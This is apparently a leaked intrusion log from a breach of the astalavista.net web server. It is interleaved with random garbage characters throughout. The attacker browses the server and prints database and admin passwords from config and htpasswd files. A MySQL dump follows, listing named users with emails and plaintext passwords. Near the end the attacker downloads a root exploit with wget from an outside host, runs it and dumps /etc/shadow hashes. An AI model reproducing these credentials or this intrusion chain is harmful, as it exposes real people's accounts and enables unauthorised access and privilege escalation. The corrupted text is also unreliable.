# Y9 \2 l r- Rdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0076 z7 O# u6 L! l$ S) B
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql# f* g1 A$ y0 U6 w
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com9 g7 W4 @ C, {# U
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend( g; h4 q; A! _( y2 o
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner* @2 p9 X" Q# j3 j
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg( K/ B* \- Q- K% D5 |6 y& E
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
. ^7 Q! f+ Z& O7 gdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron1 h; o# H. F0 a- h5 x% M9 U) e
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd" d% l* z( T' v0 r* J5 k5 u
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php+ w2 D n( c1 @6 U7 G) _
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
# F$ X1 A, f0 Adrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
: P Q$ s' ]7 e( @drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
+ d; U7 _3 n# Z+ X-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess; I. U+ J* b. H3 T! t) n
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess- p/ Z- |% \" K) S+ L
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php, C. i" H8 R- d7 E
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html8 ?& w" j4 a1 y8 Z7 I+ o
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
/ {0 `; c9 S9 G7 S% e3 M: t; l v-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
, l. E% B# _7 G7 F0 k9 K/ E) l-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf& I/ L0 e" D0 }8 s$ ]
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc/ w4 ^, _! t3 I) E0 a& H" c4 _! z. J
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang6 d& X7 m* A& X
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
$ Q9 j, c) [; S0 b: y2 q6 kdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
' _# z* G6 k2 ~' Xdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member! R. y/ t' U0 o) \, T7 ]% p, S
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
) k4 W, K. M# @* mdrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new( ~ X8 X8 w' l! V1 Q6 @. V% J% r
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
+ D# {2 A v% P3 n# `+ Kdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
# u; b# {" q$ b; |7 U: K# x-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
* {7 b5 S" O4 ]$ Q1 x% ~drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss3 V0 @* G ~# R `9 t( ]
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
$ c4 H/ j6 h# k! o8 o" Kdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
7 a6 a4 m' D- y: A% U6 Udrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes I) r( }- e$ k2 e, B
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
6 u6 n4 m6 [# f. ]. |5 t- {# fdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
" t+ l# Z6 y: i$ S% odrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
& S: e7 t9 W3 |/ L* V3 r8 Y- hdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old/ [% E1 |* X8 c/ z5 u' f
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
: I* h, i3 z# F* {( x% w% Idrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
8 f4 C- k; z5 D4 e/ q4 ?
) h% m% T% q$ rsh-3.2$ head -20 index.php
( b- m0 s1 `8 p& \( x! b. _6 ` s<?PHP
6 U- C# ]/ @6 v: L7 H/**4 d- Q" A6 z9 H Z5 {; x" O
* Mainfile (external) for astalavistaNET v2.0& p3 J& e4 D) A4 K
*
) G; R( M. v Q1 c, k8 @( u* @copyright Astalavista IT Engineering GmbH
4 f* I8 M1 B: ~7 Z* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>1 j+ X7 n3 [3 D8 m) _4 V" g) Z
* @version 1.0
0 f( H% }! F; ^6 M7 o5 O1 _" {3 E3 ?( j*/
_0 {! X3 g5 K1 u v* t) D1 Y# v s# v* ] E5 H8 G+ R4 u! [
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {6 q$ x& [. U$ h! v9 u2 i( ?
$dontStartSession = false;
# k+ V( Y' n$ Z7 F } else {' d( @& C" o9 D% i- W. E4 a2 A
$dontStartSession = true;
% a* i1 ~$ W6 m }1 h1 S, {: q! M2 X4 z
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);+ r) t; }+ j" j, z
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
! J! `8 ~4 j; Z3 Y( N! k' M* ~ require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);. {' r6 D) ?+ l
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
2 o, G1 A, q3 @+ R) l# T' [4 ~4 o! v- n- O7 N( i
sh-3.2$ cd config
5 _3 W" K- l; }sh-3.2$ ls -la! X. p3 d5 T( @8 ]$ C6 M6 O
total 32( w5 {) z* p2 a4 r2 q0 {
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .! b' l) k9 k; ~2 @
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
; F5 x9 m' g$ [/ M" G. i-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php9 i# k; o: j$ z( x4 I% N; U( G+ J
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
# f) y: v$ K U9 ?" M) z-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
3 G5 j% v4 { ?3 |% e- \! M-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php3 C2 U3 l# ^" k9 [% j; c2 m
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
- i$ X6 u& v9 k# N$ T0 _+ R7 N4 v$ w- e! j$ J
sh-3.2$ cat com.conf.php% @: J6 f$ c; M f
[snip]
4 Q+ S4 r3 X2 @+ W//member-database
9 c8 |2 t6 W; D7 b$ W: r$ a: B$_CONFIG['db_mem_server'] = ‘localhost’;2 t- L. T# n! P: g4 }4 Z* T
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;+ ]/ G+ \$ w( Z& k: b4 ~
$_CONFIG['db_mem_user'] = ‘astanet_db’;& W1 G" p3 f5 F. l& F
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
! e; q- g6 l) n$_CONFIG['db_mem_debug'] = false; //true or false
+ {6 _: n2 c2 E9 A/ R//ads-database: l# G4 q9 G/ f) h
$_CONFIG['db_ads_server'] = ‘localhost’;, C* H( P$ y2 @9 q
$_CONFIG['db_ads_database'] = ‘astanet_ads’;2 L# c% h, l0 j( R* Y7 t4 z3 d
$_CONFIG['db_ads_user'] = ‘astanet_db’;
! F9 |; t( R3 }" T" e$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
3 l0 c' f/ _5 z" A$_CONFIG['db_ads_debug'] = false; //true or false
4 g) ?9 k& N: D//rainbow-database( l4 p8 {. Y! a r, O' {. g) Q! \
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
5 y, h, U( v& M; [. Q7 x$_CONFIG['db_rainbow_database'] = ‘rainbow’;1 I* W( C9 d/ S3 g( L
$_CONFIG['db_rainbow_user'] = ‘dinu’;+ k1 H3 [& V0 R8 N/ A0 Q7 Y
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
( ^* k/ J4 m5 [5 C# \, ~$_CONFIG['db_rainbow_debug'] = false; //true or false
0 N0 J% s: h1 Z4 x//mailing lists database# R M: @0 O& z
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
- }! D6 i. @$ ]5 I' r2 ~; u0 ?. }$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;2 U, y% v9 P. p- x8 @3 f% n
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
) o. _9 c+ k/ [. J6 J/ E5 _# g$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
+ b8 {& a) d' l$_CONFIG['db_mailing_lists_debug'] = false; //true or false+ X* [+ ^- n+ @
//paypal
+ k% K' t( s+ [ A$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;/ \; f; ]3 L" I& k
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;0 H" |) T7 |1 y* e) h
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
" Q# x# n. w4 E( { J8 Z: u$_CONFIG['sub_pp_noship'] = ‘1′;
, R4 s8 O3 b4 p; n3 H$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;4 q q; U3 T% X# \2 s8 ]
[snip]
. E0 {0 ?$ T- k& y- R' t9 h
4 Q3 Z$ w) S2 A) q; h% h$ Ssh-3.2$ cd ..
2 F' B, C0 m' M7 Bsh-3.2$ cd member. ]* s& ?& H6 }# K6 j
sh-3.2$ ls -la' g) Z% |* v4 L, t6 u- K5 F
total 20
3 [) M- }# U5 n9 b) R* t' Rdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 . F# X7 c7 A6 y. {0 V" a
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .. d" x2 B) \; s. y
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
7 X* V/ ^* r. I8 g! {7 N-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
0 n% c2 B2 E; y5 z% x. s' gsh-3.2$ cat .htaccess
0 D6 `3 A; R: m0 W9 A9 PSecFilterEngine off
( ^5 |# W q3 S: @
Y% C% F7 i, Q- p/ L! s0 k8 _sh-3.2$ cd ..
6 |* |% p0 t+ e$ a' L! @+ {/ ]# _sh-3.2$ cd cron
7 ~+ r, @% X# W/ @, l* ssh-3.2$ ls -la
% R! R) A+ j* g5 ?% G& f- }total 168
9 [2 J! e8 q. V7 wdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .0 K, x* G. a. f4 Y- g, }$ L
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..0 V* |7 s& ], K) g5 k8 r! l! d
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
X) ^, w) t( j5 R-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php" v- o" k- p% Z8 y1 W2 Z1 x6 o
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php% k7 |& E; {, H& `
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php5 q" V6 N. B3 Y
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
! S7 p7 s$ y6 \/ ], A2 @4 t-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php& f1 t# x. Z+ @7 s# E5 P
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
" A& h, @- f2 z. H-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php% y# H, O4 B* |( y7 j4 j) t
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
! I2 T8 C; k8 p3 D-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php, ^9 y" | K) y' p7 i% N
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php4 W% R( G+ T; [' k K; \. \) ^$ H
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php( ], C6 f& |% b5 [
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh- w8 G( _- Y: {* V' _
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php7 O8 U$ ^/ X3 G& [- q0 U7 I
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php {* ?+ [* {6 ^9 d, @. M5 O
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
1 H0 s& e8 P' j-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
s" H I6 e' E-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
1 Y% u; K1 ~% H; n0 f' x( vdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
9 G0 }3 S% ?. f/ u-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php* y7 g j1 c5 s J" r2 d( ~7 e
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php% [; C1 @( g$ e7 J8 y0 ]
1 x% V& E; v) n& m& E! G
sh-3.2$ cd ..- k& C3 o1 M% D
sh-3.2$ cd _007& y" m" O0 A) H% @% v9 ~+ ], t; c1 A
sh-3.2$ ls -la) X7 D$ K6 {) K B9 i! p, h
total 24- c( `3 r/ k7 x& E
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 ." R" _. h+ a: L: \
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
) H. R; c# C- J) {2 i6 I-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
7 ` \9 @& M! h/ D! Z3 }+ G0 n-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
$ z1 ], d0 \# j2 m7 w+ v-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
# i; h, ^8 w5 h |0 h$ y$ \: Ndrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
& Y' A; { N, V- q( ~: I
- U; F2 Y9 l3 `sh-3.2$ cat .htaccess
& E! R2 G2 h0 s) Z6 ^( dauthType Basic" P: u; q- j( P& O
authName Admin
; d* l S- Y. kauthUserFile /home/astanet/auth/.htadm_pwd
- A6 L0 m5 v, R5 H" prequire valid-user4 g& M( j* A& C0 S$ o* [ f$ c u
+ I" e* h( H& |( }% Vsh-3.2$ cat /home/astanet/auth/.htadm_pwd6 j% Z; |; g6 R. o! B- W
admin2net:CR0bl65MwhfT2 q" }2 y* u$ [$ ] N
8 w" H. ?% B7 e8 x; Z0 H3 k! Z e+ b) zsh-3.2$ mysql -u astanet_db -p& E7 U p e$ E% U% p2 x$ S$ z
Enter password:
0 C) M Z# d8 N& R& VWelcome to the MySQL monitor. Commands end with ; or \g.8 O/ |3 D- ?% l3 F% |$ R7 S9 T
Your MySQL connection id is 275153
+ S3 d3 x$ Q% ~Server version: 5.0.45-community-log MySQL Community Edition (GPL)- {* x$ f" v% u7 K ~
- Q; c; M4 T' h8 Q
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
, |3 u! Z" ~5 T5 r8 Y8 w% w. c( a: Y: d4 t3 u; i. Y8 M5 c
mysql> show databases;
6 Z7 }7 D: `. D n8 i+———————–+. @. ]+ e3 v9 o0 t5 p/ z( y
| Database |( K$ @6 T& o# c$ E. i; U
+———————–+
! I4 N* r K8 C6 Z| information_schema |7 t: \7 x5 l+ A- J: x) B& Z; E0 @0 g
| astanet_ads |8 C9 u# ]8 g0 d+ K# ]
| astanet_mailing_lists |
3 p: ?1 d. X0 e2 f| astanet_mediawiki |! n2 X7 K6 w! h7 K0 G5 y
| astanet_membersystem |
. I( u/ e9 U7 ~: r' a A| test |; [9 Z6 ~3 W- k
+———————–+
9 G/ Q: l* U1 s' Q6 a# A5 A0 v6 rows in set (0.00 sec)! m( n9 Q7 n3 _: W
% V9 [' S. V) g; K& V/ j
mysql> use astanet_membersystem
- B$ C; s5 D. x) H# M% i& b2 N: }Database changed
+ u3 H# P$ @8 v. w5 u7 ]mysql> show tables;- Y; `& I& p6 B6 k3 r, k
+———————————–+
c' j6 v D0 p% N' e( L3 K| Tables_in_astanet_membersystem |- U9 K! n$ C+ O( f( E+ [3 W3 k3 X/ T
+———————————–+2 m) R7 R6 i/ _* A1 |; R- t
| blacklist_categories |7 e; n( G. i! s7 m, }4 z* X
| blacklist_content |
9 Q7 V: e/ P/ Q| blacklist_levels |
) a6 Z: D4 e- F$ P* a| blacklist_mcset | \3 ]4 s# X7 ~& s/ _$ n$ b
| dir_categories |7 l: f3 C" A; s+ N; Q
| dir_comments |% ^% Z) L' z9 |# |& J! V: G
| dir_links |& O( ~: c9 Y& E: m: `! n
| dir_temp |7 ?. |$ _! x" ^' a0 B P
| dir_votes |
( O6 I4 U1 a2 d# K| documents |. X3 M7 t4 {1 r8 V1 ]% t# ]1 `% U
| documents_categories |& }8 Y: ?" Y% M. D' O
| email_content |# u, @9 s- `/ Y3 s
| email_settings |0 y: f( r; T: s% F& M
| exploits |: v6 V! l; c' u( t. g% q
| exploits_categories |
4 F1 b6 c! h e1 j" m) x3 b# W$ C c| exploittree_categories |
- S) Y3 H. y* J8 R6 K| exploittree_exploits |; d# o# Z" H" O* ^% u" k, U2 w
| home_values |
K! D: H+ w' G" }" o( g* I! U| iso_countries |
; D& E- r9 m2 b| links_categories |" L8 M9 T% I$ u1 n5 P1 ?; a
| links_records |
; z/ d7 h0 Q2 C0 h$ F; `4 T| links_unauth |
. P- \ G# V% R. ~) d. E| links_votes |
G3 ~* V8 f1 {' Q1 R! d: s* A| log |
: h; u) Q2 r$ D/ N! \6 Y3 Y| news_categories |0 ? K# w- ^, r
| news_comments |3 ?* x/ o O3 R0 O" Z: `( M8 ~
| news_emoticons |% S( u9 k. v, |1 F' ?- l
| news_latest |
6 O; |# x) _2 U! S t3 _1 k$ a| news_messages |
* Q8 r5 L/ X7 r' _& Y| news_statistics |# L9 X+ Q( G2 _: B: Q* @
| news_votes |1 Z3 n/ `3 E& R: I$ x
| prices_content |3 z6 }2 W* y) c. ~$ v8 A
| prices_offers |
: l6 d2 _8 ?# Z| rss_settings |9 j( V5 U+ V$ n3 G- Z. m, _4 y2 G
| sessions |
1 f# N2 U2 g, F/ p8 H| stats_signups |
: H! q' a! ~1 T1 D3 J- f| u2u2 |
1 B) f3 ?* F. }0 ~1 i- V| u2u_contact |
" k: H' Q+ f- p! j5 G0 \& ~| u2u_settings |9 C6 p1 \" ?# H" ^0 R6 `) I
| user_keywords_selected_categories |
' v3 t# \ ~% v/ T$ G& V| users |7 L$ | ?) r( Y* O* u. F1 s
| users_ipn_test |
" u2 e& f. P7 Q4 ^/ Z" i/ `| users_keyword_values |
' V. |/ Q* p: i: G! `| users_profile |
( Q" P @& I/ b g| users_temp |* a( O0 z* j/ s2 e( u- \. H% J
| users_upgrade |3 W" N1 |3 E2 j7 f
+———————————–+
3 A+ b4 H" ]2 d5 x+ Z' P$ h46 rows in set (0.00 sec)
, Y: Z4 r Y. p' J
+ L$ Q% d* `, |, ^6 N; cmysql> describe users;( f* ~! j4 B3 B, B
+————————–+————————————–+——+—–+———————+—————-+
$ j& V4 f# M. S1 M| Field | Type | Null | Key | Default | Extra |0 v8 x/ x, h' V
+————————–+————————————–+——+—–+———————+—————-+
% Q9 ~: L7 _6 l| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
) Y& F5 v: f% r0 I: h: d% l j| user | varchar(50) | NO | | | |: ?( v+ u# _) R* \0 x& o7 A( `
| nickname | varchar(30) | NO | MUL | anonymous | |; n' n$ g6 K; _$ h
| password | varchar(30) | NO | | | |. y% l4 `. x# v2 Q$ x/ {, \# ?: O6 d
| userlevel | tinyint(3) | YES | MUL | NULL | |2 c: e" N" g1 u( @# f
| exp | int(8) unsigned | NO | | 0 | |4 Q6 J) Y: y( C- Y2 @2 j" p
| email | varchar(50) | NO | | | |
4 }" G. y, P5 n* i7 B6 t| ip | varchar(15) | NO | | 0 | |( E6 u7 l( Q2 i: E
| proxy | set(’0′,’1′) | NO | | 0 | |; {8 R( w- Q5 U% t
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
o8 X2 d. t ~' S| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
4 g8 B6 ~ L+ I| anz_in | tinyint(1) | NO | | -1 | |% i/ F3 Z8 e1 R/ c0 Q, b- D+ U4 @# ~
| status | tinyint(1) unsigned | NO | | 0 | |5 t1 g% l' {/ K7 k* g' m2 h
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
+ @' T& e1 V9 o| freemember | set(’0′,’1′) | NO | | 0 | |1 p* |: h% E; N Q; [
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |0 ^/ {2 b, I( f) L8 n3 l) G
| lang | tinytext | NO | | | |
8 K: a6 y- b8 N$ [* @. w. v: ?) }| adid | smallint(6) | NO | | 0 | |
' \- v; ~: ~$ @5 S( @; j| pp_txn_id | varchar(255) | YES | | NULL | |
4 L/ f- i) g* G3 G" F8 l3 R| cnb_transaction_id | varchar(255) | YES | | NULL | |
4 @3 _- u+ o3 |* `| cnb_order_id | varchar(255) | YES | | NULL | |1 A3 ]* o" `8 ]
| cnb_user_id | int(11) | YES | | 0 | |; l0 o( _% W* u: h( V! m' |6 c
+————————–+————————————–+——+—–+———————+—————-+
; M0 F; o( y6 e4 W3 o- l/ M22 rows in set (0.01 sec)) I) g6 \+ ?( v, _* W- n
6 t% J6 D x9 r9 z. z( T
mysql> select count(*) as skids from users;
( M8 H; K% \' E4 [; a) \+——-+# L2 Y; N! t& \. K0 Y
| skids |3 N9 ]: s+ ]& U4 L/ }- n, I
+——-+& d6 ~" d3 A0 b( m5 N2 e
| 25199 |: ?) H2 O; U; g. d- }3 S
+——-+
+ f: ?3 t+ f8 `, ]9 V1 row in set (0.00 sec)
8 n9 J+ c* T$ F8 p o( c
& D7 J6 D" F& |8 imysql> select user,nickname,password,email from users where userlevel = 1;: b% j9 q! G5 a k- H* W' S8 S! v6 L
+————————–+———————-+——————+———————————–+
' _# G& j. f2 [$ b2 R$ a# B4 N' Z| user | nickname | password | email |
0 D- S( V, {! a/ N6 B+ j+————————–+———————-+——————+———————————–+
9 V; K9 ]3 k6 R; I; j: o| pascal | prozac | astaman3 | 链接标记info@astalavista.net |# n* c& _: O: E, a
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |: f& f" n( h. g. y9 s4 d T
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
$ P- h) ~' G- b u2 z! R| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
# f5 _0 N! I# C" F1 p# c) n4 r, j| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |2 ~* l! j1 o, C- i0 S' @& `
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
3 `9 a# E. A6 g6 j* l| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |, e, K" @/ n* q0 h) \
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
0 Z$ Y* {! Z" q0 k| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |5 x7 [, j1 Z3 a( t. P
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
0 g* j9 p( A3 e| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
+ Z, ~# e* Q( {* X| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
" s( h- H V, o| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |# L2 b5 A" _( s3 k7 g- {5 ?
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |( ]7 t, f, d3 |2 y, q. m; A
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |+ L2 R6 r' P# |6 S- G
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |! x: W$ i0 U1 i, I
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |6 b$ J" Y, a) i5 R' Y6 U
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
& P* t* I" f2 O2 N" @, W$ O| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |9 B+ B8 U& a# w% v# H" v
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |- m6 `5 [' k# v
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |2 l4 Y+ i q! N9 v* q& g
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |, k3 O( [( e( B8 O/ u9 ]) T3 e7 T5 K
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |3 n# l* }$ \4 U+ B- `
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |$ K; S0 a. y& z+ W) Y
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
. l. H3 ^& _2 A) d, Q| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |6 p; m' \/ N) O7 P x; c/ e( l1 [5 L8 x
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
, ]7 S5 c$ K6 m+————————–+———————-+——————+———————————–+) {5 q1 y& x; U- w' H1 u
27 rows in set (0.00 sec)
" F( S- s/ N7 O4 l w( X. s& n
2 J y3 M6 H$ y9 O' {2 t! Rmysql> exit;/ x0 B* @3 x7 N; U
Bye1 X- A2 d8 j: x1 Q( [ Q2 x o
U* e' L( L T- o
[~] plaintext passwords? yes,# m5 g9 O0 v# }. b
Those so called “security professionals” who charge you $6.66 / month to7 k* q5 H' T# w
register at their hack-proof portal, save your passwords in plaintext…
8 J& a& o4 u/ S8 dbrilliant!
7 M5 q3 P+ D1 H6 c# U
2 \( @6 m. P& A$ q- ^[~] This been fun but we want more." v& Q! g! ^, x
" h- L8 q9 W) ?sh-3.2$ uname -a
9 N5 u3 u$ _: |, J' }: @& d v# wLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
% J2 n' [# G( I- e2 W. ]9 Csh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url] g, W; J, z9 H! z* a6 y
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url] L3 Y$ N- N$ n2 a, e
Resolving anti.sec.labs… 13.33.33.378 F. R; @0 d- P5 x0 H; Q. R
Connecting to anti.sec.labs|13.33.33.37|:80… connected.& J5 ^0 |9 s( R4 P6 t
HTTP request sent, awaiting response… 200 OK7 [4 e$ F- @$ W
Length: 18200 (18K) [text/plain]' m2 D3 J5 B, b, G. n& [
Saving to: `g0troot’
% t$ y6 H* ]9 r3 O( V/ W) `
- M- B/ t. z* S6 p* y% _' T100%[=========================================================================================================================================>] 18,200 58.6K/s in$ \% U% m. k; m! l; z
0.3s
+ e6 W' m7 C$ x8 ]% w' g- ?5 P T
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
6 v9 p, X9 W' a" O- p$ O3 q
) e, K; T* X% h1 J. q; i7 ]sh-3.2$ ./g0troot -i x86_649 [/ k$ A5 }/ g5 Y; T9 r4 P% Z
[+] g0troot - anti.sec.labs
3 k2 H% m$ D6 Z2 H# m U[+] Target: 2.6.18-128.1.10.el5
; i' J2 g1 q! A( @3 o: q5 ]# g8 N[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
& B8 b! K: B; ?7 ]* x, R" s U. ]: k! a5 l# |7 z
[+] r00tr00t
# R- h5 z s' z( j& ^[~] Executing shell…) k- Z$ p! g. I) h6 b: T3 Y
1 g0 b5 y- @5 ush-3.2# id( F7 j8 h& Z) S9 p
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)# B) {: Z2 Z' |- x7 ~2 c
. C, d4 y! Z3 E6 f# g) G. H. n
sh-3.2# cat /etc/shadow$ }" ?' k( |. w! ~0 m& z0 A8 O2 \
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
5 c( }6 m8 {% \1 H; F: j# l[snip]8 w$ r2 J. \- |9 i9 S1 T1 V
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::5 h7 a- |2 {8 Y# I+ L
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::4 q" ^3 _& B1 t4 q4 Q
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
